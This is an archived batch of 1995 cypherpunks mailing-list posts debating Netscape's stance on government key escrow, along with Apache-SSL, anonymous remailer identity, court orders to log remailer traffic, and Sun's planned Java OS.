> >> >what is the rule on exporting software again?"
> >> >
> >> >I am impressed that some effort is being made.  I think it in the form of 
> >> >'too little, too late.'  But hey, who am I?
> >> 
> >> I think you are being too critical, they have done more than any
> >> company I know of to make easy to use crypto widely available.
> >
> >0 + .00001 = .00001
> >
> >Yes, just as last time you checked, .00001 is still more than 0.
> 
> My point is that you are too quick to call your recent ally an enemy.

Netscape was never my ally.  They looked like a company worth investing 
in.  For the time I held stock, they were.  Their morass on this issue, 
and my general dislike for overhyped firms, made the investment less and 
less worth it to me.

Netscape did about what was par for the course, include crypto in a 
product that is likely to be used for financial information.  You think 
this is some great accomplishment?

You only strengthen my view that you are easily impressed.

> You may not see what Netscape has done as important, but I believe
> that many do (including me).  They are supposed to have integrated
> e-mail crypto in the final release of Navigator 2.0.  I will remind
> you that Jeff Weinstein has said that this will not include GAK.

I don't CARE what Netscape's past is.  I care what Netscape is doing with 
the signifcant power and voice they have.  I wonder if Netscape is 
selling out.

> >> They
> >> may be willing to obey the laws if they require GAK, but I do not feel
> >> that they are just rolling over either.  I strongly oppose GAK, but I
> >> do not believe that no crypto is better than GAK crypto.  I would
> >> rather keep some people out than nobody out.
> >
> >Your ignorance is assuming that the options you present are the only 
> >options available.  JW made the same mistake.  In logical discourse this 
> >is called "narrowing the field."  It's a version of the 'straw man' 
> >and a classic flaw in logical argument.
> 
> I am not saying that the choice is between either no crypto or GAK
> crypto.

Now you need to read your answers more carefully.  Look up 11 lines.

  I am saying that they have only said that they will go to GAK
> if the choice is between GAK crypto and no crypto.

Read a few more lines up, where you say you don't think Netscape is 
rolling over.

  To the best of my
> knowledge they have not said that they would implement a GAK only
> product in any other situation.

In fact they have said very little of anything.  This is the point.


Again, what rises to the level of an 'anti-GAK' position in your view 
astounds me.  "Well, they didn't say they would implement GAK unless they 
had to."

"Well, I'll stop all this drug trafficking if anyone tells me I have to."

  I think that this is reasonable, I do
> not think that we should let it come to this.  We need to insure that
> they (or anyone else) are never put into that position.  (and yes they
> should to.)

Boy, sure seems like your ready to come out swinging!  But let's wait a 
week, eh?

> >> Dan Weinstein
> >> djw@pdcorp.com
> >> http://www.earthlink.net/~danjw
> >> PGP public key is available from my Home Page.
> >> All opinions expressed above are mine.
> >> 
> >> "I understand by 'freedom of Spirit' something quite definite -
> >> the unconditional will to say No, where it is dangerous to say
> >> No.    
> >
> >This has got to be the most ironic of signatures I have ever seen.
> >
> >Why don't you begin to apply the cute quotes you put in your .sig to real 
> >life and tell Netscape to grow a backbone and say 'No.' to GAK?
> 
> I sent a message to Netscape after reading the article that started
> this,  It simply stated that I wanted clarification on their position
> on GAK and that if they were to support it they would lose a loyal
> customer.  I have since been convinced by Jeff Weinstein's posts to
> this list that the company does not support GAK, and in fact they
> oppose it.

And what have they done to oppose it precisely?  Show me something 
besides 'send a man down' or 'appoint a committee' or 'consider the issue 
for a pending policy release.'

  You would do better to spend less time insulting people
> and more time trying to support your arguments.

And you need to read questions and your own statements before starting 
a reply.

> 
> Dan Weinstein
> djw@pdcorp.com
> http://www.earthlink.net/~danjw
> PGP public key is available from my Home Page.
> All opinions expressed above are mine.

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 95 16:14:43 PST
To: cypherpunks@toad.com
Subject: apachessl info
Message-ID: <199512040015.BAA22063@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"James A. Donald" <jamesd@echeque.com> wrote:
>>At 11:32 PM 12/2/95 -0800, sameer wrote:
>>       I hate to repeat myself, but sometimes people don't listen.
>>http://www.c2.org/apachessl/

>This Web page fails to explain what Apache-SSL actually is, what it is good
>for,
>and why people should use it.

What I missed was the how-to on getting a certified key. Wasn't there a way
of doing that through e-world (Apple's on-line service) for free?

Wilhelm Busch

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMMI8XYiUi5SQtQ3tAQFplQf/Ua4/xmkbLRkDCqK1ws6HkhG4IyzFIz0r
ESxaEXme6Ev9jTIzQtR+Stabi31H1hbMwkOR/MKSxx9vhuCpzX4PrKtjaMpugXMy
nJ6voHmveZd4gErQJ6TM9X42TroaypDa/lL6Bc9UGAGoMAl37tst/jzL3l11iRfO
OLKrsL9rDRtwu50sdulqEhrbphuTZriPuReDR5ZluAwZzsDcu8Upor1DIP9W+bVu
zYTziaFmHAigP/dJOyi6x/Zd6aDoIl2U55YfQ+Pa3RUyarDVIjcnR/D6N8NeB7Cr
XSZo78T9mG4JygZItY86z9Ct5vL1o1MzSNcm3KmuUwuyYOJcGUlddg==
=Jry0
-----END PGP SIGNATURE-----

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQEPAzC9XzIAAAEIAMJ9b1kiyvrhoa5OGf7G1hSt6yWmzX7napWo5qRAh+xUE+Ue
ftxUmGE1p/lFoUJIRKhH2I0yktcp3Wirmm61rIfJ5S0s9BnE3W+Uk8B1jxim2JvZ
ezOPn0so+dUJP4tvtzDQZDCk5VGTsJkMAvhxahripQKpkWC5qL9nM9cvKa2ZnFjT
8NRaaAx1eMST/k4ntc431jFXNgnBDrxNBb8RNMb7b7jtFGOFN8Y3Mj5TmprXps2V
ydtL57Z85MKfFjkAMeMtugqieJBWEsqA3C1/wKhB9cKb1Rdu/97VpZ0v+FQe9Y1k
qwsQ78chNzBpfHjxSSuo8T4NV0AZiJSLlJC1De0AEQEAAbQNV2lsaGVsbSBCdXNj
aA==
=/fpw
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Sun, 3 Dec 95 17:10:33 PST
To: cypherpunks@toad.com
Subject: Re: Jim Clark, "Mr. Bubble"
In-Reply-To: <199512032055.VAA13990@utopia.hacktic.nl>
Message-ID: <30c24a22.19293808@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995 21:55:09 +0100, you wrote:

>Alex Strasheim:
>
>>  >       1     Make illegal software available by FTP
>>  >       2     Explain it's doing so because ITAR is bullshit
>>  >       3     Face the gov't down in the press and in the courts 
>>  
>>  Go for it.  We're behind you 100%.
>
>      If I were worth billions, if I were the sparkle on the high-tech
>bubble, if I had a Major hand in engineering crucial protocols, if my
>company were so young that it hadn't yet had time to bog down in business
>as usual, I think I probably would. That's a lot of Big talk and a lot of
>Ifs, ain't it? But that's how it goes: I doubt he -- or anyone else --
>would give as much to my LDF as I gave to his (chump change, but more than
>I could afford).
>      Clark should ask himself what Rabbi Akiva put best: 
>
>      If not me, who?
>      If not now, when?
>
>      I do my small part, in my small way; he can do his big part, in his
>big way. One thing scares the spooks more than what they oppose:
>publicity.

You have just proven your self to be a hypocrite.  If you expect of
others more than you expect of your self, you need to reevaluate your
own life.  If you are not willing to risk your life, fortune, and
reputation on your beliefs, how can you expect Mr. Clark or anyone
else to do the same.
 

Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 4 Dec 95 01:43:08 PST
To: cypherpunks@toad.com
Subject: Re: Do the Right Thing
Message-ID: <199512040942.BAA22190@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Timothy C. May wrote:


> Netscape, being the dominant browser company, and Microsoft, being the
> dominant OS company, are in special positions to "build in Big Brother."
> I'm not claiming they are, just that they are clearly in a position to make
> it technologically more feasible to make non-GAK illegal. They both need to
> carefully think about the role that's been "given" to them (whether by
> fortune, hard work, or being in the right place at the right time) and do
> what's right.

That's always a tough position to be in.  If Netscape or Microsoft
knew what was the "right" thing to do, I don't doubt that they'd be
doing it.

The problem is always that there is no crystal clear "right" answer
on lots of these issues.  Everything is always "fuzzy" because of the
possible consequence that flows from action.

> Strong words, perhaps, but the implications of mandatory key escrow are
> quite clear. We debated these points for a long time during the Clipper
> debate, and later when "Software Key Escrow" began to rear its head. I
> won't repeat these arguments against GAK here, but will take this
> opportunity to quote from a new book that actually quotes my words:

Good quote, Tim.  

I'll lift a glass of eggnog at the end of the "open door policy" as
well.  It really doesn't serve anyone's interests at all.  My concern
is the policy wind-down challenge.  It can call for a real strong
stomach sometimes, as Greenspan could probably attest.  

It probably shouldn't be embraced except by the most foolish of fools.

> And time is of the essence. Things move very fast. It is no longer the case
> that a law is passed, then companies respond to the new legal regime with
> their own policies and products. Companies, especially in high tech, are
> "partners" from the start, as we saw with the Clipper development (where
> AT&T had known about Clipper for years prior to the first public
> announcement, and was cooperating in the development of it, not to mention
> the other companies such as Mykotronx, VLSI Technology, etc., which were
> involved in secret for years).

Sure, this isn't news to anyone.  Time is now compressed.

There usually has to be some lead time to these things.  AT&T as an
example has been well rewarded -- in fact, some circles might suggest
that they were overly well-rewarded -- when they got a $1 Billion plus
preferential contract in the Middle East (Bahrain, if memory serves ...)
following Desert Storm.

Does this then mean that anyone should be surprised with Thomson-CSF's
alternate means against Raytheon?  Not this cowboy.  

We're into a completely different altitude of engagement here.
Completely different.  And in this case, we not only face an enemy,
but we're surrounded with civilians who can get caught in the
cross-fire.  No different than the orphans who were used as human
shields in Bosnia.

These companies generally need to be briefed early on what the action
plan will be and on the possible range of consequences and the
attendant probabilities so that proper contingencies can be drawn up.
Unless of course, these companies are actually your adversary, while
posing as your friend, in which case it's best to keep them out of the
loop altogether.  

Probably best just to amuse them, as you do a child in a crib, while
you go about your affairs.

> It is only sheer speculation on our part (some of us, at least) that
> negotiations about GAK have been going on with the major software
> companies. Jim Clark, for example, learned what he knows about key escrow
> _someplace_, and it probably wasn't from our list or from articles he'd
> read. I'm betting, but could of course be wrong, that he and other folks at
> Netscape (and I mustn't leave out Microsoft, Sun, SGI, Apple, etc.) have
> been briefed on key escrow and that various negotiations are already
> underway. This would match how things were done with Clipper, and would
> explain Clark's voiced support for the need for GAK.

Clark's voiced support for GAK is one of the most insane ideas I have
come across.  Does he have any idea of what he is tinkering with?
Does he know how to play his tune of Tommy the Tinkerer??

Somehow, I have doubts.  Serious doubts.

His GAK comments could trigger a very nice cascade throughout the
entire high-tech sector which could spill over and out.  "Friendly
Fire" could be deadly to some American financial powerhouses.  Not
only could Jim throw a monkey-wrench into the exit-strategies of
valley venture-capitalist's, but this whole scenario could well 
spill into other issuers if he's not careful.

To understand, the market truly is not looking at Netscape as a
"software" play.  It is the quintessential Internet play -- a whole
"new" economic sector.  

The sector which many Dow firms (IBM, AT&T, and Disney) hope to
exploit as part of their mid to long-term business plans. Future 
earnings forecasts and indeed valuations up and down the street
are based around the assumption of Internet success.  Jim is playing
with fire, if the audience he's _hoping_ to address isn't listening to
him while _another_ audience in fact is.

Anyone who doubts this, or thinks that the markets aren't particularly
vulnerable and sensitive, shouldn't listen to me -- who am i -- they
should listen instead to the true "professionals".  

Here's what Doug Casey, an investment adviser out of Baltimore is
writing:

    "We're at the tail end of one of the great manias of history,
    where value is thrown totally to the wind and everybody with two
    nickels to rub together plans on making a million with mutual
    funds.  I sincerely hope that all the best happens and the market
    goes to 10,000.  But I'm not planning on joining the party.  Since
    May, 1985, when the mutual fund assets market reached a $100
    Billion (US), asset growth has gone hyperbolic.  Half of all the
    money in equity funds has come in during the last TWO years.  It's
    a mania of historic proportions.  It's completely and totally
    insane."

I might go one step further, and ask the thorny question of how much
of that recent mutual fund investment -- the "hot money" that's come
in over the last two years -- is actually "leveraged money".  How much
of it is borrowed funds?  Probably a pretty fair chunk.

Then I might ask how many of these casino bets, are with money that
people truly can't afford to loose.  How many IRA's or college funds
are invested either directly or indirectly in Spyglass, or some other
darling??  Instead of prudent "blue-chip" stuff, that couldn't
*possibly* ever take a big hit -- parts of the Dow Industrials -- like
AT&T or Disney??  Again, probably a fair chunk.

Let's suppose that as a result of Jim's GAK comments, people loose
faith and ask to redeem their mutuals.  What's the cash-position of
these funds?  Do they have the liquidity to meet the redemptions or
will they have to engage in selling wave after selling wave -- selling 
everything regardless of "fundamentals"?  And then will the across
the board selling cause ever more redemptions as hopes and dreams 
fade and as reality sets in?

Maybe, I'll help answer that question, by quoting analyst, Leo Hood,
from Gainesville Florida, who spoke of some of the risks and attempted 
to debunk the perceived "safeguards" when he wrote:

     "One by one, investors have moved their money out of conservative
     investments and into growth funds and high-tech stocks.  Many
     feel this concentration of power in the hands of a few is a
     safeguard against a horde of small investors selling all at
     once.  I think the opposite is true.  With funds down to very low
     cash levels, a panic by individuals is likely to make matters
     worse."

Hood is correct in this case, about the present state of mutual fund
liquidity.  It's next to non-existant.  And Hood raises another market
vector to contend with.  The so-called "safeguard" no longer resides
in broadly distributed wetware.  Instead, everything is auto-pilot.

The safeguard -- Mr. "Safeguard" Circuit-breaker investment fund
manager -- can't default on a client redemption.  If he doesn't have
cash in the bank, he has no option but to raise cash by selling.

In fact, he might not even have the authority or discretion to
determine what he'll sell.  He might be forced to follow the
Investment Committee's guidelines and formulae.  He might even try to
play hero, and over-sell near the perceived market "top" to meet his
anticipated future redemptions, and "beat the market", so that he and
his fund have claim to future "bragging rights".

Seeds for an anticipatory meltdown??

Possibly.

In addition to the historic mania for mutual funds, Alan Newman from
Great Neck, New York tries to help out and give us some historical
perspective on where our market sits, historically.  He looks back
many years and writes:

     "The dollar value of all U.S. stocks now amounts to 85.9 per-cent
     of nominal GNP -- far and away the highest such reading of all
     time.  Prior peaks in August 1929 at 77.4 per-cent, December 1968
     at 79.3 per-cent and December 1972 at 80 per-cent were all
     followed by brutal bear markets that lopped off at least 21
     percent in value over the next twelve months.  Two of these
     times, 1929 and 1973-74 -- marked the start of the two worst bear
     markets of the century.

To understand and give Alan's words some context, especially his
observation that these nosebleed valuation levels were invariably
followed by spectacular historic corrections, let's remember that
his data reflected old fundamentals.  The old-style market.

This is not '29 nor '73-74.  Back then, we didn't have the compressed
ultra-sensitive global market we now face, where a sneeze turns into
an earthquake.

We also didn't use the complex financial instruments (many of which
are off-balance sheet) like we now do.  And we didn't have duelling
neural nets in charge of trading. 

The seasoned professionals with the experience and human reason and
judgment to manage these events are gone.  The ones who had the
authority in the past to exercise their "judgment" in managing new
"unlearned" events have had all of their authority stripped from them.

That authority now sits in other hands.  In silicon.

During '29 and 73-74, the markets certainly weren't facing the type
of optimism that we're facing today ... (well maybe, in '29 they
were.)  An optimism which has been fuelled by the media.  Including
such memorables as the Rolling Stones "Start me up" which I've heard 
hummed in elevators.  They weren't facing the "News" on the front
page of every major periodical and the near constant bombardment on
the "Internet".

And no one need mention that nifty icon in the corner of every
computer screen.  The coverage has set individual expectations to
unattainable levels.

All of the above, might well come together to form a "series of
factors" which act serially -- factors which will magnify 
market swings.

If all of this hasn't helped convince Jim, perhaps Paul Franke from
Kansas City might shed some additional illumination on the present 
situation.  Some recent history.

He tried to look at the current market within a narrower time frame
than Alan Newman's long-term historical.  He wanted to give some
current (twelve-month) context for our consideration.  He wrote:

     "In late 1994, skepticism and pessimism among investors were very
     high.  Mutual funds had cash levels of close to 10 per-cent.
     Some 60 per-cent of investment advisers were staunchly bearish.
     Interest rates were high after rising all year.  Inflation seemed
     to be picking up steam.  Today, the stock market is in the
     opposite position it was a year ago.  Futures traders are more
     bullish than they have been in several years, and mutual fund
     cash levels have fallen to near a record low.  Cautioning
     investors to watch their step may prove to be an understatement."

Some very good advice there from Kansas City about watching your step.


We have many other vectors to consider.  One, is the manner in which
mutual funds report unit-holder value.  Mutual funds do not present
and publish a "real-time" value.  The reported NPV lags the
calculation.  The value most people see published and what they will
react to, is not actualy where "it is" -- it's actually where "it was".

This information "air-gap" will tend to make the unit-holder reaction
time much longer and will tend to continue and give life to negative
news, as well as presenting exploitation opportunities to market
professionals who have an information advantage.

Domestic and International Pros will use this "feature" to calculate
and approximate the reported unit-holder value before the report hits 
the press.  On the basis of educated "guesses", they will likely trade 
through overnight or international markets to pre-position themselves 
prior to the general release of mutual fund values to the American 
public, again magnifying the raid.

This combined interplay -- between the public and the professional --
would respectively extend the reaction period and, magnify intra-day
market movements.  Or in plain English, it would last longer and be
more volatile.  Or much more succinctly, as Irwin Yamamoto said,
"_Mutual Funds_ will be an obscene expression."

The full impact would of course require a full analysis and model of
another vector, that of the entire futures market and that of
international arbitrageurs.  When they smell blood, they tend to
behave as piranha.  Arbs and "vulture funds" have the resources --
personnel resources as well as procedural resources to preferentially
position themselves such that they have an advantage of trading
execution and a preferential view of how market buy/sell orders flow
into the theatre of the exchange.  

Both professional types are prepared at a moment's notice to jump in
or refrain.  They can assess track record's, determine
capitalization's, psychoanalyze the personalities of everyone involved
and phone everyone in their Rolodex looking for some clue and subtlety
to play.

(Arbs not only have Breaking News Co-ordiantors but are also privy to
particular intelligence.  They recall how the market-makers took it on
the chin in '87 and had to go to the window.  Many market-makers made
great sacrifices in attempts to maintain order during '87.  A
sacrifice they may not willingly make to ensure system-liquidity now.)

All of these factors (and many more) will tend to interplay in one big
international soup.

Clearly, Jim is not only in position to influence the future of GAK,
but he could cause a great deal of trouble throughout the chain of the
US financial system.  The market does not need a jittery Chairman,
going on about GAK.  No one is served by this type of play.

I doubt the President wants a market meltdown as we start to move
towards an election year.  Body bags and a bad economic front are a
bad mix and could swing the whole election with the dual near 
unsurmountable election obstacles.  Then again, Bob Dole probably 
wouldn't want to take hold of the Presidential reins in that 
environment, either.

As an endnote to something that really wasn't relevant to Jim's GAK
comments, something which veered off and almost assumed a life of its
own, I'd say that the probability of the foregoing is certainly in
excess of one chance in ten.

> I hope Jeff W. and Jim C. can have some _long_ chats. The stakes are too
> high for product decisions to be made without full awareness of the
> implications. 

Yep, we're in "the shit" as they say.  

> The statements from Jim Clark do tend to imply a kind of
> defeatism, and even Jeff's comments seemed laden with qualifications about
> "only if the government requires us to." As Hal Finney noted in his post,
> it's as if the Netscape people are preparing for the inevitable. Maybe it's
> not an indication that GAK is being considered within Netscape, but maybe
> it is. After all, one rarely hears "only if we have to" qualifications on
> things that are truly from out in left field.

Preparation can be a good thing.

I still think that coming out and saying what is being said, is risky
business.  It is a comment out of left field.  But then I'm not privy
to all the variables either, so take my comments with a grain of salt.

> (A side point, somewhat abstract: The dominance of Netscape, rising from
> nowhere to becoming the major player in this debate, illustrates a point
> about "monocultures" and their ecological effects. If yellow corn is good,
> replace other strains of corn with yellow corn. Pretty soon, the world's
> corn output is 96% yellow corn. Some ecological downsides to this. In this
> case, Netscape is becoming the yellow corn of the Web, and an obvious
> "choke point" for the NSA and its sisters to mandate crypto policies.
> Hence, the role of non-yellow-corn alternatives...)

Yep Tim, I'll agree with you on this. 

I think Maurice Strong has also been saying something along these lines 
for some time.  Warning about systems and monocultures.  Sadly,
monocultures can develop without our even seeing it.  Or at least, I
think Maurice has been saying something along those lines in his own
fashion.

> And what Netscape agrees to put in future releases of its browsers or its
> servers could have dramatic effects on the whole climate.

Sure.  Just like Christmas in Bosnia will, undoubtedly.

'Tis the season ...

Hopefully, god-willing, we won't face any tragedies.




Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 3 Dec 95 23:32:40 PST
To: blancw@accessone.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <9512040703.AA14762@pulm1.accessone.com>
Message-ID: <Pine.SUN.3.91.951204023207.24617A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995 blancw@accessone.com wrote:

> 
> Uni, if you're so overwhelmingly and absolutely incensed with Netscape, why 
> don't you write to Jim Clark yourself and tell him about his spinelessness and 
> all your other opinions of him, his unaccceptable attitude, and his worthless 
> company, instead of getting granular with Jim and Dan here on the list?
> 
> After all, Jim Clark is the one who made the unpleasant statements.
> 
>   ..
> Blanc
> 

I would hope that other's might recognize the trend in Netscape and work 
to act as I have.

I have written Mr. Clark.

> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Don M. Kitchen" <don@cs.byu.edu>
Date: Mon, 4 Dec 95 02:29:17 PST
To: cypherpunks@toad.com
Subject: Re: ANNOUNCEMENT: ALICE'S ADDRESS REVEALED.
In-Reply-To: <Pine.LNX.3.91.951203113046.13147B-100000@micro.internexus.net>
Message-ID: <ML-2.0.818072907.7349.don@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Someone posing as Alice said:
> As I promised, I've now opened a channel so that anyone who wants to
> can send Alice de 'nonymous email.  I can now be reached via
> an455120@anon.penet.fi.  Mail sent to Alice de 'nonymous at that
> address will get to me, and I will do my best to reply to you as well,
> but I can't guarantee, anything.

Laszlo Vecsey <master@internexus.net> said:

> I don't think that was a smart thing to do. Your real email is now 
> registered in some database in Finland - how difficult would it be to 
> retrieve it? From what I remember organizations like Scientology had no 

Not _nearly_ as hard as breaking/finding an appropriately encrypted key.

I for one am not going to even bother with the penet address unless the
posts come from there. After all, it's a forgery anyway. The real Alice
already posted a PGP key. I wouldn't be reading this list if I were
going to fall over for a simple impersonation.

Of course, if our impersonating, trusts-penet-not-PGP-coworkers-think-
of-everything-but-a-packet-sniffer Alice were to post from penet,
then everyone (including procmail ;) would have to believe his claims
of pseudo-identity.

I must say, L.D. is really falling all over himself this time. Maybe
he's just trying to make people *think* he's a cryptobungler, so that he
can keep his other tentacles with whom he converses out of suspicion.

Don

Wishing Emacs had IMAP support cuz here comes mailcrypt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 4 Dec 95 00:43:07 PST
To: cypherpunks@toad.com
Subject: Re: Diskless "Eunuchs" Machines Likely to Fail
Message-ID: <Pine.BSD.3.91.951204032704.13763G-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
12 03 95 Edupage reports: 
 
 
SUN PLANS JAVA-LIKE MICROKERNEL
 
Sun Microsystems is already working on a microkernel-like operating 
system to run low-tech "Internet appliances."  Dubbed Java OS, Sun's 
chief technical officer Eric Schmidt calls it the "natural next step" 
for Java.
 
The new software will "take the Java classes and put them on the mini- 
mum OS functionality you need.  You can add additional functionality 
by writing in Java," he says.  It will require only 4 to 8 Mbytes of 
memory, and will not support Windows applications or other programs 
that make large demands on system memory. 
 
"This thing doesn't come with Sound Blaster and speakers.  If you need 
a PC, buy a PC," says Schmidt. 
 
                                     (Information Week 4 Dec 95 p104) 
 
 
The condescending tone illustrates the points made by wfgodot@iquest.com 
on 11 30 95: 
 
 It seems that many corporate types are fixated on the idea of tractable
 and predictable consumers. 
 
 [snip] 
 
 The approach to understanding the actual dynamics of why people are and
 will increasingly come into this space and what they will want to do
 once they get there is deficient for many. 
 
 [snip] 
 
 Others are puzzled, or are overtly threatened by the idea of potential 
 consumer's who are also content producers. 
 
 
Cordially, 
 
Jim 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 95 18:34:36 PST
To: cypherpunks@toad.com
Subject: Re: info?
Message-ID: <199512040235.DAA29635@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Dec 95 at 22:28, j.miranda3@genie.com wrote:

> Can you send me information about your organization?
> 
>  --Joseph Miranda

Sure, Joe! We were founded several thousand years ago, have had chapters in virtually all societies and cultures beyond the truly primitive ones. Some of our members founded the United States of America some time back -- maybe you've heard of it? We have initiation rites that often involve learning arcane and complex formulae from thick books, we have secret handshakes, decoder rings, and we often like to roast our victims over a slow fire. There's hardly anything that goes on in the world that our members don't affect, and still, the society at large doesn't really know we're here. If you're looking for a secret cabal well, gee, you've come to the right place!

If you'd like an interesting and colorful brochure containing all the details and benefits of membership, just pick up the phone, call your mother, and ask for one!

Thank you for inquiring about the International Gourmet Cooking Society!

Salsa Sam










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 95 18:39:24 PST
To: cypherpunks@toad.com
Subject: Re: Jim Clark, "Mr. Bubble"
Message-ID: <199512040239.DAA29711@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dan Weinstein:

>You have just proven your self to be a hypocrite.  If you expect of
>others more than you expect of your self, you need to reevaluate your
>own life.  If you are not willing to risk your life, fortune, and
>reputation on your beliefs, how can you expect Mr. Clark or anyone
>else to do the same.

      And you've just proven yourself to be "a little bit slow";
hypocrites, at least, can change their ways. This discussion is about the
effects that Jim Clark, someone who is assessed as a billionaire and who
heads a Wall St.-bedazzling multibillion-dollar corporation, can have on
USG crypto policy; yet you would get into a tawdry comparison of "personal
failings." I will continue not to trumpet the specifics of any
crypto-promoting illegalities which I may or may not have engaged in, and
I'll thank you to do the same.

Hieronymous

>"I understand by 'freedom of Spirit' something quite definite -
>the unconditional will to say No, where it is dangerous to say
>No.        
>           Friedrich Nietzsche

      BU was right: there's gotta be a self-help book called something
like "Learning to Say YES!" that would provide you with a more appropriate
.sig.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMJeX73g0mNE55u1AQEiqAH+IXva02/4rIoegkaQEUzF9X/2nTQhGKFm
TEO6RjrN1vuegeUtBs3oNfvs4bq6Rxrnras+9EJfVCaxZam51dWDRQ==
=pRWz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Mon, 4 Dec 95 04:03:17 PST
To: bdavis@thepoint.net (Brian Davis)
Subject: Re: "Got a subpoena?"
In-Reply-To: <Pine.BSF.3.91.951201171205.5743A-100000@mercury.thepoint.net>
Message-ID: <199512041148.AA10690@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Brian Davis writes:

> On Thu, 30 Nov 1995, sameer wrote:

> > > What about a court order to (a) start comprehensive logging, and (b) not
> > > tell anyone under penalty of ______ .

> I am unaware of any authority for such an order.

This evening I ran across _In Re Application of United States of America for
Order Authorizing Installation of Pen Register_ 610 F.2d 1148 (3rd Cir., 1979),
citing to _United States v. New York Tel. Co._ 434 US 149, 54 L.Ed.2d 376,
98 S.Ct. 364 (1977), holding that Fed.R.Crim.P. 41 and the All Writs Act
28 USC 1651 give a federal district court the power to direct a telephone
company to make equipment and personnel available to assist in gathering
evidence and intelligence as part of a criminal investigation. (Also see
58 ALR Fed 719 "Authority of District Court to order telephone company to
assist law enforcement agents in tracing telephone calls", and _Michigan
Bell Tel. Co. v. United States_ 565 F.2d 385 (6th Cir., 1977).

I don't get much exposure to federal criminal law so I'm way out of my depth
re whether that interpr
tation of rule 41 is current (or if rule 41 has changed
in the intervening 20 years) but it might be a starting place. The cases
discuss the telephone companies' status as "highly regulated utilites with
a duty to serve the public" as justifying a diminished interest in autonomy;
presumably this factor would work against the commandeering of a remailer.
Westlaw shows some 860-odd screen pages worth of annotations for 28 USC 1651
and, frankly, I'm not up to reading them, at least not on a whim.

According to _In re Application of United States_, supra, and _In re
Application of United States_ 616 F2d 1122 (9th Cir., 1980), the telephone
company (and likely a remailer) is entitled to an in camera hearing prior
to the law enforcement use of facilities/personnel to determine if it is
unduly burdensome and/or how much compensation should be paid.

The opinions also don't go anywhere near the question of whether or not the
phone company had the choice to simply go out of business entirely; I think
that option would be more easily available to a remailer. If my remailer
were served with an order to begin logging, I think I might prefer to move
all of the RAM in that box over to my Windows box, say, so that I could get 
Terminal Velocity to run with SVGA resolution, or whatever. I do think
there's a meaningful difference between asking an enormous business to run
their operations a wee bit differently (or ask technicians to work overtime,
where the court pays the overtime) and forcing a single individual to
reorganize their life around a criminal investigation. (see the discussion
of over-burdensomeness)

Then again, it doesn't seem so hard for the cops to just seize the box(es)
which run the remailers, set them up down at the station, and start watching
traffic. This seems to be a factor in favor of running remailers on big
systems which would be politically more difficult to seize, e.g., Portal's
or Caltech's or some other big multiuser box owned by someone who's already
got an attorney on retainer.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMLf/X3YhjZY3fMNAQErsAQAqnZMR1JcO0TiAwIf1O6QG5Xf4UIStL/F
H7+4FHG7LREM0puuKHo1ObcSoqiOXNidz08ZTWk8AYyQdOdHlppnzSjXlnv0srZn
FkfQXiIJIIBz0MvH4cAGnBHVnQzPKK47LhaUheo4zxV9/8urwjTPeCKeWG/wR538
IEZuefyxxwE=
=IK82
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Mon, 4 Dec 95 04:43:33 PST
To: cypherpunks@toad.com
Subject: GAK the Spooks not the Civilians
Message-ID: <v03003e00ace84506f548@[129.46.82.85]>
MIME-Version: 1.0
